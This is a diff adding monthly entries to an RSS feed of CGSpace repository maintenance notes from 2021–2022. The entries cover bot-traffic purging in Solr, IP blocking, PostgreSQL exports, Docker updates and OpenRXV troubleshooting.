+&lt;li&gt;The submission works as expected&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Start debugging some region-related issues with csv-metadata-quality
+&lt;ul&gt;
+&lt;li&gt;I created a new test file &lt;code&gt;test-geography.csv&lt;/code&gt; with some different scenarios&lt;/li&gt;
+&lt;li&gt;I also fixed a few bugs and improved the region-matching logic&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-08/</link>
+      <pubDate>Mon, 01 Aug 2022 10:22:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-08/</guid>
+      <description>&lt;h2 id=&#34;2022-08-01&#34;&gt;2022-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Our request to add &lt;a href=&#34;https://github.com/spdx/license-list-XML/issues/1525&#34;&gt;CC-BY-3.0-IGO to SPDX&lt;/a&gt; was approved a few weeks ago&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-07/</link>
+      <pubDate>Sat, 02 Jul 2022 14:07:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-07/</guid>
+      <description>&lt;h2 id=&#34;2022-07-02&#34;&gt;2022-07-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I learned how to use the Levenshtein functions in PostgreSQL
+&lt;ul&gt;
+&lt;li&gt;The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing&lt;/li&gt;
+&lt;li&gt;Also, the trgm functions I&amp;rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-06/</link>
+      <pubDate>Mon, 06 Jun 2022 09:01:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-06/</guid>
+      <description>&lt;h2 id=&#34;2022-06-06&#34;&gt;2022-06-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Look at the Solr statistics on CGSpace
+&lt;ul&gt;
+&lt;li&gt;I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &amp;ldquo;msnbot-&amp;rdquo; using the Solr query &lt;code&gt;dns:*msnbot* AND dns:*.msn.com&lt;/code&gt;&lt;/li&gt;
+&lt;li&gt;I purged these first so I could see the other &amp;ldquo;real&amp;rdquo; IPs in the Solr facets&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent&lt;/li&gt;
+&lt;li&gt;I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent&lt;/li&gt;
+&lt;li&gt;I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
+&lt;ul&gt;
+&lt;li&gt;There seem to be many more of these:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-05/</link>
+      <pubDate>Wed, 04 May 2022 09:13:39 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-05/</guid>
+      <description>&lt;h2 id=&#34;2022-05-04&#34;&gt;2022-05-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
+&lt;ul&gt;
+&lt;li&gt;18.207.136.176&lt;/li&gt;
+&lt;li&gt;185.189.36.248&lt;/li&gt;
+&lt;li&gt;50.118.223.78&lt;/li&gt;
+&lt;li&gt;52.70.76.123&lt;/li&gt;
+&lt;li&gt;3.236.10.11&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Looking at the Solr statistics for 2022-04
+&lt;ul&gt;
+&lt;li&gt;52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests&lt;/li&gt;
+&lt;li&gt;64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc&lt;/li&gt;
+&lt;li&gt;185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt&lt;/li&gt;
+&lt;li&gt;157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&amp;rsquo;t know why its requests were logged in Solr&lt;/li&gt;
+&lt;li&gt;52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests&lt;/li&gt;
+&lt;li&gt;157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests&lt;/li&gt;
+&lt;li&gt;207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&amp;rsquo;t know why its requests were logged in Solr&lt;/li&gt;
+&lt;li&gt;If I query Solr for &lt;code&gt;time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.&lt;/code&gt; I see a handful of IPs that made 41,000 requests&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I purged 93,974 hits from these IPs using my &lt;code&gt;check-spider-ip-hits.sh&lt;/code&gt; script&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-04/</link>
+      <pubDate>Fri, 01 Apr 2022 10:53:39 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-04/</guid>
+      <description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
+    </item>
+    
+    <item>
+      <title>March, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
+      <pubDate>Tue, 01 Mar 2022 16:46:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-03/</guid>
+      <description>&lt;h2 id=&#34;2022-03-01&#34;&gt;2022-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Send Gaia the last batch of potential duplicates for items 701 to 980:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-02/</link>
+      <pubDate>Tue, 01 Feb 2022 14:06:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-02/</guid>
+      <description>&lt;h2 id=&#34;2022-02-01&#34;&gt;2022-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Meeting with Peter and Abenet about CGSpace in the One CGIAR
+&lt;ul&gt;
+&lt;li&gt;We agreed to buy $5,000 worth of credits from Atmire for future upgrades&lt;/li&gt;
+&lt;li&gt;We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization&lt;/li&gt;
+&lt;li&gt;We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one&lt;/li&gt;
+&lt;li&gt;We agreed to try to do more alignment of affiliations/funders with ROR&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-01/</link>
+      <pubDate>Sat, 01 Jan 2022 15:20:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-01/</guid>
+      <description>&lt;h2 id=&#34;2022-01-01&#34;&gt;2022-01-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Start a full harvest on AReS&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-12/</link>
+      <pubDate>Wed, 01 Dec 2021 16:07:07 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-12/</guid>
+      <description>&lt;h2 id=&#34;2021-12-01&#34;&gt;2021-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Atmire merged some changes I had submitted to the COUNTER-Robots project&lt;/li&gt;
+&lt;li&gt;I updated our local spider user agents and then re-ran the list with my &lt;code&gt;check-spider-hits.sh&lt;/code&gt; script on CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1989 hits from The Knowledge AI in statistics
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1235 hits from MaCoCu in statistics
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 455 hits from WhatsApp in statistics
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
+&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-11/</link>
+      <pubDate>Tue, 02 Nov 2021 22:27:07 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-11/</guid>
+      <description>&lt;h2 id=&#34;2021-11-02&#34;&gt;2021-11-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I experimented with manually sharding the Solr statistics on DSpace Test&lt;/li&gt;
+&lt;li&gt;First I exported all the 2019 stats from CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ zstd statistics-2019.json
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-10/</link>
+      <pubDate>Fri, 01 Oct 2021 11:14:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-10/</guid>
+      <description>&lt;h2 id=&#34;2021-10-01&#34;&gt;2021-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export all affiliations on CGSpace and run them against the latest RoR data dump:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;ations-matching.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;1879
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ wc -l /tmp/2021-10-01-affiliations.txt 
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;7100 /tmp/2021-10-01-affiliations.txt
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
+&lt;li&gt;So we have 1879/7100 (26.46%) matching already&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-09/</link>
+      <pubDate>Wed, 01 Sep 2021 09:14:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-09/</guid>
+      <description>&lt;h2 id=&#34;2021-09-02&#34;&gt;2021-09-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Troubleshooting the missing Altmetric scores on AReS
+&lt;ul&gt;
+&lt;li&gt;Turns out that I didn&amp;rsquo;t actually fix them last month because the check for &lt;code&gt;content.altmetric&lt;/code&gt; still exists, and I can&amp;rsquo;t access the DOIs using &lt;code&gt;_h.source.DOI&lt;/code&gt; for some reason&lt;/li&gt;
+&lt;li&gt;I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!&lt;/li&gt;
+&lt;li&gt;I will change &lt;code&gt;DOI&lt;/code&gt; to &lt;code&gt;tomato&lt;/code&gt; in the repository setup and start a re-harvest&amp;hellip; I need to see if this is some kind of reserved word or something&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Even as &lt;code&gt;tomato&lt;/code&gt; I can&amp;rsquo;t access that field as &lt;code&gt;_h.source.tomato&lt;/code&gt; in Angular, but it does work as a filter source&amp;hellip; sigh&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;m having problems using the OpenRXV API
+&lt;ul&gt;
+&lt;li&gt;The syntax Moayad showed me last month doesn&amp;rsquo;t seem to honor the search query properly&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-08/</link>
+      <pubDate>Sun, 01 Aug 2021 09:01:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-08/</guid>
+      <description>&lt;h2 id=&#34;2021-08-01&#34;&gt;2021-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Update Docker images on AReS server (linode20) and reboot the server:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
+&lt;li&gt;I decided to upgrade linode20 from Ubuntu 18.04 to 20.04&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-07/</link>
+      <pubDate>Thu, 01 Jul 2021 08:53:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-07/</guid>
+      <description>&lt;h2 id=&#34;2021-07-01&#34;&gt;2021-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;COPY 20994
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-06/</link>
+      <pubDate>Tue, 01 Jun 2021 10:51:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-06/</guid>
+      <description>&lt;h2 id=&#34;2021-06-01&#34;&gt;2021-06-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;IWMI notified me that AReS was down with an HTTP 502 error
+&lt;ul&gt;
+&lt;li&gt;Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification&lt;/li&gt;
+&lt;li&gt;I don&amp;rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the &lt;code&gt;angular_nginx&lt;/code&gt; container isn&amp;rsquo;t running&lt;/li&gt;
+&lt;li&gt;I simply started it and AReS was running again:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-05/</link>
+      <pubDate>Sun, 02 May 2021 09:50:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-05/</guid>
+      <description>&lt;h2 id=&#34;2021-05-01&#34;&gt;2021-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents:
+&lt;ul&gt;
+&lt;li&gt;&amp;ldquo;RI/1.0&amp;rdquo;, 1337&lt;/li&gt;
+&lt;li&gt;&amp;ldquo;Microsoft Office Word 2014&amp;rdquo;, 941&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&amp;hellip; as that&amp;rsquo;s an actual user&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-04/</link>
+      <pubDate>Thu, 01 Apr 2021 09:50:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-04/</guid>
+      <description>&lt;h2 id=&#34;2021-04-01&#34;&gt;2021-04-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I wrote a script to query Sherpa&amp;rsquo;s API for our ISSNs: &lt;code&gt;sherpa-issn-lookup.py&lt;/code&gt;
+&lt;ul&gt;
+&lt;li&gt;I&amp;rsquo;m curious to see how the results compare with the results from Crossref yesterday&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;AReS Explorer was down since this morning, I didn&amp;rsquo;t see anything in the systemd journal
+&lt;ul&gt;
+&lt;li&gt;I simply took everything down with docker-compose and then back up, and then it was OK&lt;/li&gt;
+&lt;li&gt;Perhaps one of the containers crashed, I should have looked closer but I was in a hurry&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-03/</link>
+      <pubDate>Mon, 01 Mar 2021 10:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-03/</guid>
+      <description>&lt;h2 id=&#34;2021-03-01&#34;&gt;2021-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Discuss some OpenRXV issues with Abdullah from CodeObia
+&lt;ul&gt;
+&lt;li&gt;He&amp;rsquo;s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API&lt;/li&gt;
+&lt;li&gt;Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGSpace CG Core v2 Migration</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/</link>
+      <pubDate>Sun, 21 Feb 2021 13:27:35 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/</guid>
+      <description>&lt;p&gt;Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.&lt;/p&gt;
+&lt;p&gt;With reference to &lt;a href=&#34;https://agriculturalsemantics.github.io/cg-core/cgcore.html&#34;&gt;CG Core v2 draft standard&lt;/a&gt; by Marie-Angélique as well as &lt;a href=&#34;http://www.dublincore.org/specifications/dublin-core/dcmi-terms/&#34;&gt;DCMI DCTERMS&lt;/a&gt;.&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-02/</link>
+      <pubDate>Mon, 01 Feb 2021 10:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-02/</guid>
+      <description>&lt;h2 id=&#34;2021-02-01&#34;&gt;2021-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Abenet said that CIP found more duplicate records in their export from AReS
+&lt;ul&gt;
+&lt;li&gt;I re-opened &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/67&#34;&gt;the issue&lt;/a&gt; on OpenRXV where we had previously noticed this&lt;/li&gt;
+&lt;li&gt;The shared link where the duplicates are is here: &lt;a href=&#34;https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6&#34;&gt;https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I had a call with CodeObia to discuss the work on OpenRXV&lt;/li&gt;
+&lt;li&gt;Check the results of the AReS harvesting from last night:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;{
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  &amp;#34;count&amp;#34; : 100875,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  &amp;#34;_shards&amp;#34; : {
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;total&amp;#34; : 1,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;successful&amp;#34; : 1,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;skipped&amp;#34; : 0,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;failed&amp;#34; : 0
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  }
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-01/</link>
+      <pubDate>Sun, 03 Jan 2021 10:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-01/</guid>
+      <description>&lt;h2 id=&#34;2021-01-03&#34;&gt;2021-01-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter notified me that some filters on AReS were broken again
+&lt;ul&gt;
+&lt;li&gt;It&amp;rsquo;s the same issue with the field names getting &lt;code&gt;.keyword&lt;/code&gt; appended to the end that I already &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/66&#34;&gt;filed an issue on OpenRXV about last month&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;I fixed the broken filters (careful to not edit any others, lest they break too!)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV
+&lt;ul&gt;
+&lt;li&gt;The start page had been &amp;ldquo;1&amp;rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API&lt;/li&gt;
+&lt;li&gt;I adjusted it to default to 0 and added a note to the admin screen&lt;/li&gt;
+&lt;li&gt;I realized that this issue was actually causing the first page of 100 statistics to be missing&amp;hellip;&lt;/li&gt;
